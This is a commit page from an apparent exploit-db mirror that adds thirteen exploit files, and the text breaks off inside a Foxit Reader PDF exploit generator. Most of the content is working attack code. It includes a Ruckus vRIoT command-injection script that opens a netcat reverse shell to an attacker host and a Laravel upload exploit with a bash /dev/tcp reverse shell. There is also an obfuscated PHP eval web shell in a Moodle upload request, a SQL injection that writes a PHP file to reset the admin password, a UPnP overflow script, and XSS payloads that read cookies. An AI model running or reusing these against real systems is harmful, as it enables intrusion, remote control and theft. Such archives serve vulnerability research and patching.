bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-11-28

Browse source 
13 changes to exploits/shellcodes

libupnp 1.6.18 - Stack-based buffer overflow (DoS)
SAP Lumira 1.31 - Stored Cross-Site Scripting
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
Moodle 3.8 - Unrestricted File Upload
Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
House Rental 1.0 - 'keywords' SQL Injection
ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
This commit is contained in:
Offensive Security 2020-11-28 05:01:59 +00:00
parent 1306b3ff5f
commit 673a45a464
14 changed files with 923 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

101
exploits/hardware/webapps/49110.py Executable file
View file

@ -0,0 +1,101 @@
# Product: Ruckus IoT Controller (Ruckus vRIoT)
# Version: <= 1.5.1.0.21
# Vendor: https://support.ruckuswireless.com/
# Vulnerability: Command Injection & Broken Authentication
# References: CVE-2020-26878
# Discovered by: Juan Manuel Fernandez
# Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
# Exploit Author: Emre SUREN
# Disclosure Date: 2020-10-26
# Tested on: Appliance
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests, urllib3, sys
from Crypto.Cipher import AES
from base64 import b64encode, b64decode
from colorama import Fore
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def listen(lhost, lport):
opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
if opt == "y":
return True
else:
return False
def generatePayload(lhost, lport):
payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
return payload
def generateMagicToken():
enc_dec_method = 'utf-8'
salt = 'nplusServiceAuth'
salt = salt.encode("utf8")
str_key = 'serviceN1authent'
str_to_enc = 'TlBMVVMx'
return encrypt(enc_dec_method, salt, str_key, str_to_enc)
def encrypt(enc_dec_method, salt, str_key, str_to_enc):
aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
mret = b64encode(hx_enc).decode(enc_dec_method)
return mret
def execCmd(rhost, rport, lhost, lport):
payload = generatePayload(lhost, lport)
post_data = {
"username": payload,
"password": "test"
}
print(Fore.BLUE + "[*] Payload\t: " + payload)
token = generateMagicToken()
headers = {
"Authorization": token
}
rpath = "/service/v1/createUser"
uri = 'https://' + rhost + ":" + rport + rpath
r = requests.post(uri, json=post_data, headers=headers, verify=False)
print(Fore.BLUE + "[*] Request sent")
if r.status_code == 200:
print(Fore.GREEN + "[+] Successful. Check for the session...")
else:
print(Fore.RED + "[X] Failed. Check for the response...")
print(Fore.BLUE + "[*] Response\t: " + r.text)
sys.exit()
def main():
if (len(sys.argv) != 5):
print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
print("[*] <RHOST> -> Target IP")
print("[*] <RPORT> -> Target Port")
print("[*] <LHOST> -> Attacker IP")
print("[*] <LPORT> -> Attacker Port")
print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
exit(0)
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
if not listen(lhost, lport):
print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
else:
execCmd(rhost, rport, lhost, lport)
if __name__ == "__main__":
main()

18
exploits/linux/dos/49119.py Executable file
View file

@ -0,0 +1,18 @@
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958
import socket
payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"
byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))

26
exploits/multiple/local/49108.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting
# Date: 13.08.2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://www.sap.com
# Software Link: SAP Lumira
# Version: <= 1.31
# Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105
# Vulnerable System: https://system/BOE/BI
# Reproduce Cross Site Scripting (XSS):
1. Select Web Intelligence Button
2. Wait for SAP Business Objects to load complete
3. CTRL +N or click on New Document
4. Create an empty document
5. Select new variable
6. Select random name for the variable
7. Add the XSS vectors from evidence
8. Open variable tab and click on new created variable name
# Cross Site Scripting (XSS) Vectors Used:
• "><h1><IFRAME SRC=#
onmouseover="alert(document.cookie)"></IFRAME>123</h1>
• <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">

87
exploits/multiple/webapps/49113.py Executable file
View file

@ -0,0 +1,87 @@
# Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
# Date: 2020-07-30
# Author: Julien Ahrens
# Vendor Homepage: https://www.acronis.com
# Version: 12.5 Build 16341
# CVE: CVE-2020-16171
VERSIONS AFFECTED
====================
Acronis Cyber Backup v12.5 Build 16327 and probably below.
VULNERABILITY DETAILS
========================
All API endpoints running on port 9877 under "/api/ams/" whereof some are
reachable without authentication, do accept an additional custom header called
"Shard":
def get_ams_address(headers):
if 'Shard' in headers:
[...]
return headers.get('Shard') # Mobile agent >= ABC5.0
The value of this header is afterwards to construct a separate web request send
by the application using a urllib.request.urlopen call:
def make_request_to_ams(resource, method, data=None):
port = config.CONFIG.get('default_ams_port', '9892')
uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
logging.debug('Making request to AMS %s %s', method, uri)
headers = dict(request.headers)
del headers['Content-Length']
if not data is None:
headers['Content-Type'] = 'application/json'
req = urllib.request.Request(uri,
headers=headers,
method=method,
data=data)
resp = None
try:
resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
except Exception as e:
logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
return resp
This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts
of Acronis services that are bound to localhost such as the "NotificationService" running
on 127.0.0.1:30572 with a request header like:
Shard: localhost:30572/external_email?
For more details, see the referenced blog post.
RISK
=======
The vulnerability can be used by an unauthenticated or authenticated attacker
to query otherwise unreachable internal network resources. As demonstrated in
the corresponding blog post, using this vulnerability, it is possible to i.e.
(amongst others) send out fully customized emails or modify the application's
resource settings.
7. SOLUTION
===========
Update to v12.5 Build 16342
8. REPORT TIMELINE
==================
2020-07-30: Discovery of the vulnerability
2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a
request to the Vendor to check whether Cyber Backup is EOL and users
are advised to migrate to Cyber Protect instead.
2020-07-30: CVE requested from MITRE
2020-07-31: MITRE assigns CVE-2020-16171
2020-07-31: Public Disclosure date set to 2020-08-14
2020-08-04: Vendor asks for a 90 days extension
2020-08-04: Extension not granted because there is a fix available already. Public disclosure
date set to 2020-09-14
2020-09-05: Asking vendor about the status of the fix
2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the
reference ABR-202103
2020-09-14: Public disclosure
9. REFERENCES
=============
https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/
https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm

34
exploits/php/webapps/49107.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: http://demo.themeftc.com/wibar
# Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798
# Version: 1.1.8
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
The WordPress theme contains Brands feature which is vulnerable to stored
cross site scripting. The logo URL parameter is vulnerable to cross site
scripting. The following vector was used for testing XSS: "><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>.
In order to reproduce the vulnerability, please follow the next steps:
1. Log in as editor/administrator/contributor/author:
https://website.com/wp-admin
2. Go to Brands section
3. Click add new brand and add a custom brand title
4. The vulnerable parameter is: Logo URL / <input type="text"
name="ftc_brand_url" id="ftc_brand_url" value="">
5. Add the following payload: "><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where
base64 == alert(document.domain)
6. Publish
7. The alert will pop up when a user will visit the website on
https://website.com/brand/vulnerablebrand.
Evidence:
1. https://ibb.co/1fpYJWN
2. https://ibb.co/S7j5Sgd
C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High

44
exploits/php/webapps/49109.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
# Google Dork: "WonderCMS"
# Date: 2020-11-27
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Vendor Homepage: https://www.wondercms.com/
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
# Version: 3.1.3
# Tested on: Ubuntu 20.10
Steps-To-Reproduce:
1. Login and select button setting
2. Go to tab Files, and upload file contains payload xss with extension like html, svg, htm
3. Go to http://target.lc/data/files/<name-file> and trigger XSS
POST /home HTTP/1.1
Host: wordpress.lc:8081
Content-Length: 372
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.lc:8081
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://wordpress.lc:8081/
Accept-Encoding: gzip, deflate
Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf
Connection: close
------WebKitFormBoundary6EKP5vjUNS5Icgql
Content-Disposition: form-data; name="uploadFile"; filename="xss.html"
Content-Type: text/html
<script>alert('XSS')</script>
------WebKitFormBoundary6EKP5vjUNS5Icgql
Content-Disposition: form-data; name="token"
5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da
------WebKitFormBoundary6EKP5vjUNS5Icgql--
--

54
exploits/php/webapps/49112.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
# Author: Victor Campos and Xavi Beltran
# Contact: vcmartin@protonmail.com
# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
# Date: 25/3/2020
# Software link: https://github.com/FrozenNode/Laravel-Administrator/
# Version : 4
# Tested on: Laravel-Administrator 4
# CVE : CVE-2020-10963
#!/usr/bin/env python
import requests,json,traceback
from requests.auth import HTTPBasicAuth
#Parameters to be set up (ENTER YOUR VALUES)
#===========================================
# Listener IP and port
ip = ""
port = ""
#Admin credentials
user = ""
password = ""
#URLs of the web application
domain = "" # For example "https://www.example.com"
login_url = "" # For example "/user/login"
fileupload_url = "" # For example "/admin/categories/image/file_upload"
uploaded_files_url = "" # For example "/categories/images"
#Reverse shell payload (DO NOT MODIFY THIS SECTION)
#==================================================
#GIF file header
shell = "GIF89a\r\n"
#php reverse shell
shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"
with requests.Session() as s:
try:
print("\n[+] Logging into the panel")
s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
print("[+] Uploading the malicious file")
r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
print("[+] Response text:")
#print(r.text)
shell_file = (json.loads(r.text))["filename"]
print("[+] Name of uploaded file: " + shell_file)
print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
r = s.get(domain + uploaded_files_url + '/' + shell_file)
except Exception as e:
print(str(traceback.format_exc()))

54
exploits/php/webapps/49114.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Moodle 3.8 - Unrestricted File Upload
# Date: 2019-09-08
# Exploit Author: Sirwan Veisi
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
# Tested on: Moodle Version 3.8
# CWE : CWE-434
I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that
allows the attacker to upload or transfer files of dangerous types.
Example exploitation request:
POST /repository/repository_ajax.php?action=upload HTTP/1.1
Host: VulnerableHost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------38898830537874132223151601680
Content-Length: 2763
Origin: https://VulnerableHost
Connection: close
Referer: https://VulnerableHost/user/files.php
Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
Upgrade-Insecure-Requests: 1
-----------------------------38898830537874132223151601680
Content-Disposition: form-data; name="repo_upload_file";
filename="image.php"
Content-Type: image/jpeg
GIF89a;
<?php
$Q=str_replace('kz','','crekzakztkze_kzfunckztkzion');
$O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i';
$l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@';
$C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%';
$h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean';
$N='}%%^$k{$j};}}retu%rn
$o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t';
$e='Nmy694Bcj%Vc";fu%nction%
x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o=';
$V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}';
$P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V);
$n=$Q('',$P);$n();
?>
-----------------------------

42
exploits/php/webapps/49115.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
# Google Dork: N/A
# Date: 2020-08-24
# Vendor Homepage: https://accesspressthemes.com
# Software Link: https://wordpress.org/plugins/accesspress-social-icons/
# Version: <= 1.7.9
# Tested on: Ubuntu 18.04
Description:
A blind SQL injection vulnerability is present in Ajax load more.
<?php
$si_id = esc_attr($atts['id']);
global $wpdb;
$table_name = $table_name = $wpdb->prefix . "aps_social_icons";
$icon_sets = $wpdb->get_results("SELECT * FROM $table_name where si_id =
$si_id");
POC:
POST /wordpress/index.php?rest_route=%2Fwp%2Fv2%2Fposts%2F66&_locale=user
HTTP/1.1
Host: pwnme.me
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101
Firefox/79.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pwnme.me/wordpress/wp-admin/post.php?post=66&action=edit
X-WP-Nonce: 514cd2ab3f
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://pwnme.me
Content-Length: 103
Connection: close
Cookie: wp-settings-time-2=1597912773;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=author%7C1598405206%7Cwp7Nu56SQz9nIWmkqZr94WFIpGZ6VfcTT5KaYPUULWe%7C3c4c3a80cbfd049b95b04a6104ded9b05f33f8a9900ccec818d5aa43c7102c79;
wp-settings-time-3=1598234126
{"id":66,"content":"<!-- wp:shortcode -->\n[aps-social id=\"4 and
sleep(5)\"]\n<!-- /wp:shortcode -->"}

94
exploits/php/webapps/49117.txt Normal file
View file

@ -0,0 +1,94 @@
# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-08-07
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
# Version: 1.0
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# OWASP Top Ten 2017: A1:2017-Injection
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
# Vulnerability Description:
# House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
# to execute arbitrary code on the hosting webserver via sending a malicious POST request.
# Vulnerable Source Code:
# /config/config.php
# 11 try {
# 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
# 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
# /index.php
# 5 if(isset($_POST['search'])) {
# 7 $keywords = $_POST['keywords'];
# 11 $keyword = explode(',', $keywords);
# 12 $concats = "(";
# 13 $numItems = count($keyword);
# 15 foreach ($keyword as $key => $value) {
# 17 if(++$i === $numItems){
# 18 $concats .= "'".$value."'";
# 19 }else{
# 20 $concats .= "'".$value."',";
# 23 $concats .= ")";
# 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
# 48 $stmt->execute();
import requests, sys, re, json
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
def sig():
SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n"
SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n"
SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n"
SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n"
SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n"
SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n"
SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0]
return SIG
def header():
head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
return head
def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]
if __name__ == "__main__":
print(header())
print(sig())
if len(sys.argv) != 2:
print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
sys.exit(-1)
SERVER_URL = sys.argv[1]
if not re.match(r".*/$", SERVER_URL):
SERVER_URL = SERVER_URL+'/'
INDEX_URL = SERVER_URL + 'index.php'
EXECUTE_URL = SERVER_URL + 'execute.php'
LOGIN_URL = SERVER_URL + 'auth/login.php'
s = requests.Session()
get_session = s.get(INDEX_URL, verify=False)
pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
SQLi = s.post(url=INDEX_URL, data=pdata, verify=False)
if SQLi.status_code == 200:
print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
else:
print(err+'Cannot send payload to webserver.')
sys.exit(-1)
try:
print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
EXECUTE = s.get(url=EXECUTE_URL, verify=False)
except:
print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
sys.exit(-1)
print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])

46
exploits/php/webapps/49121.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
# Date: 2020-08-22
# Exploit Author: Vyshnav NK
# Vendor Homepage: https://www.elkarbackup.org/
# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation
# Version: 1.3.3
# Tested on: Linux
Reproduction Steps:
1 - Go to the elakarbackup/login
2 - Login with default credentials
3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]"
4 - Click on Save
5 - We can see the Javacript Code executed Sucessfully
XSS Attack vectors :
"><svg/onload=alert(4)>
"><svg/onload=alert(document.cookie)>
Request :
POST /policy/1 HTTP/1.1
Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1123
Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
Connection: close
Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1?
Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505
Upgrade-Insecure-Requests: 1
Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on
Response :
<form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">

37
exploits/php/webapps/49122.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79
[i] :: Info:
An Authenticated Persistent XSS vulnerability was discovered in the
Best Support System, tested version — v3.0.4.
[$] :: Payloads:
13"-->">'` -- `<!--<img src="--><img src=x
onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>
[!] :: PoC (Burp Suite POST request):
POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]
app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2

273
exploits/windows/local/49116.py Executable file
View file

@ -0,0 +1,273 @@
# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Date: August 29, 2020
# Exploit Author: CrossWire
# Vendor Homepage: https://www.foxitsoftware.com/
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: 9.0.1.1049
# Tested on: Microsoft Windows Server 2016 10.0.14393
# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)
#!/usr/bin/python3
'''
===========================================================================
| PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) |
===========================================================================
| Written by: Kevin Dorland (CrossWire) |
| Date: 08/29/2020 |
| |
| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
| |
| References: |
| https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |
| https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) |
| |
===========================================================================
'''
PDF_TEMPLATE = '''
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
function prepare_heap(size){
var arr = new Array(size);
